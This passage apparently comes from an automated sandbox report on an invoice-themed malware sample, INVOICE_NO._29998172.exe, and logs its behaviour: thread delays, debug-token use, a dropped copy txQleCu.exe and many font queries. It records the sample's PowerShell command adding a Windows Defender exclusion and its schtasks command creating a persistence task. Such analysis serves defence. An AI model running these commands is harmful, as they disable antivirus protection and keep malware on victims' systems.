                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99732
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99624
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99515
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99384
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99265
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99156
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99040
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 98921
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99842
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99713
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99609
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99500
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99391
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99277
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99172
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: txQleCu.exe, 0000000C.00000002.627295234.0000000000DF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.627240721.00000000010AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Users\user\Desktop\INVOICE_NO._29998172.exe VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
